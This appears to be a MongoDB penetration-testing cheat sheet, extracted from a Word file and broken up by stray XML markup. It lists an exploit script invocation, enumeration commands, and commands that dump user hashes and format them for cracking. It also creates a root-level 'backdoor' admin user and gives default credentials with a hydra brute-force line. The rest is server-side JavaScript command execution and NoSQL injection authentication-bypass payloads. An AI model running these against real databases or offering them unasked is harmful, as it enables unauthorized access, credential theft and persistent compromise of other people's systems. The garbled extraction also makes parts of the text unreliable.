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https://hackviser.com/tactics/pentesting/services/MongoDB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Mongobleed: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https://github.com/joe-desimone/mongobleed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python3 mongobleed.py --host &lt;target&gt;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Regular port is 27017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nmap -p 27017 -sV -sC &lt;target&gt;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8ouwj9v1f5ov" w:id="0"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Install mongosh: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Download the .deb package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wget https://downloads.mongodb.com/compass/mongodb-mongosh_2.3.4_amd64.deb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Install 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dpkg -i mongodb-mongosh_2.3.4_amd64.deb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If you get dependency errors, fix them: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apt-get install -f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Verify installation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mongosh --version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Clean up the .deb file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rm mongodb-mongosh_2.3.4_amd64.deb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20bihuh4qca0" w:id="1"/>
      <w:bookmarkEnd w:id="1"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Connection: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No auth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mongosh mongodb://&lt;host&gt;:27017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With auth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mongosh mongodb://user:pass@&lt;host&gt;:27017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8t76n0otxup6" w:id="2"/>
      <w:bookmarkEnd w:id="2"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Initial Enum Commands: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MongoDB version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db.version()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Get current database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db.getName()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Get current user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db.runCommand({connectionStatus: 1})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Check if JavaScript is enabled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db.adminCommand({getParameter: 1, "javascriptEnabled": 1})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vzhxlkbldh67" w:id="3"/>
      <w:bookmarkEnd w:id="3"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DB Enum Commands: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list all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show dbs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Switch database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 &lt;database_name&gt;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List collections (tables)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show collections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Select * From &lt;collection&gt;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db.&lt;collection&gt;.find().pretty()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Select * From &lt;collection&gt; limit 10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db.&lt;collection&gt;.find().limit(10)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kxmcs7si9n1n" w:id="4"/>
      <w:bookmarkEnd w:id="4"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Enumerate Users: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 admin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db.system.users.find()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db.getUsers()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db.adminCommand({usersInfo: {forAllDBs: true}})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Check if authentication is enabled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db.adminCommand({getCmdLineOpts: 1}).parsed.security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Extract User Hashes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Requires admin access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 admin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db.system.users.find()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Format Hashes for Cracking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db.system.users.find().forEach(function(u)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print(u.user + ":" + u.credentials["SCRAM-SHA-1"].storedKey);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5w0t97cmz7l" w:id="5"/>
      <w:bookmarkEnd w:id="5"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Create admin user: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use admin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db.createUser({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user: "backdoor",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pwd: "P@ssw0rd123!",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roles: [{role: "root", db: "admin"}]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ey9e4ylazg9g" w:id="6"/>
      <w:bookmarkEnd w:id="6"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Bruteforcing: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Common default credentials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admin:admin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admin:password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root:root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mongodb:mongodb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user:user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hydra -l admin -P /usr/share/wordlists/rockyou.txt target.com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sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_hnz9i7smbo7p" w:id="7"/>
      <w:bookmarkEnd w:id="7"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Test Javascript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db.collection.find({$where: "sleep(5000) || true"})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db.collection.find({$where: function()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var cmd = "whoami";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var output = run("bash", "-c", cmd);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}})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db.collection.mapReduce(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function() { emit(this._id, this);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function(key, values) {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// Malicious code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return "pwned";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{out: {inline: 1}}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hivgfl6ze8s0" w:id="8"/>
      <w:bookmarkEnd w:id="8"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Execution (very unlikely):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Check if JavaScript Execution Enabled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db.adminCommand({getParameter: 1, javascriptEnabled: 1})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Execute System Commands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Requires special configuration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db.runCommand({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eval: "function() { return run('whoami'); }",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nolock: true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Using $where for Command Execution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Deprecated but might work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db.collection.find({$where: "return shellHelper.run('whoami')"})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st1yq4t80z3o" w:id="9"/>
      <w:bookmarkEnd w:id="9"/>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">NOSQL Injection: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// Authentication bypass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{"$ne": null}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{"$ne": ""}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{"$gt": ""}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{"$regex": ".*"}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{"$exists": true}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 OR operator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{"$or": [{"username": "admin"}, {"username": "user"}]}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IN operator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{"$in": ["admin", "user", "root"]}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// NIN operator (not in)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{"$nin": ["invalid"]}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WHERE operator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{"$where": "1==1"}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{"$where": "sleep(5000)"}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 Regex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{"$regex": "^admin"}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{"$regex": ".*"}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Array manipulation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{"$elemMatch": {"$ne": null}}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ackviser.com/tactics/pentesting/services/MongoDB" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/joe-desimone/mongobl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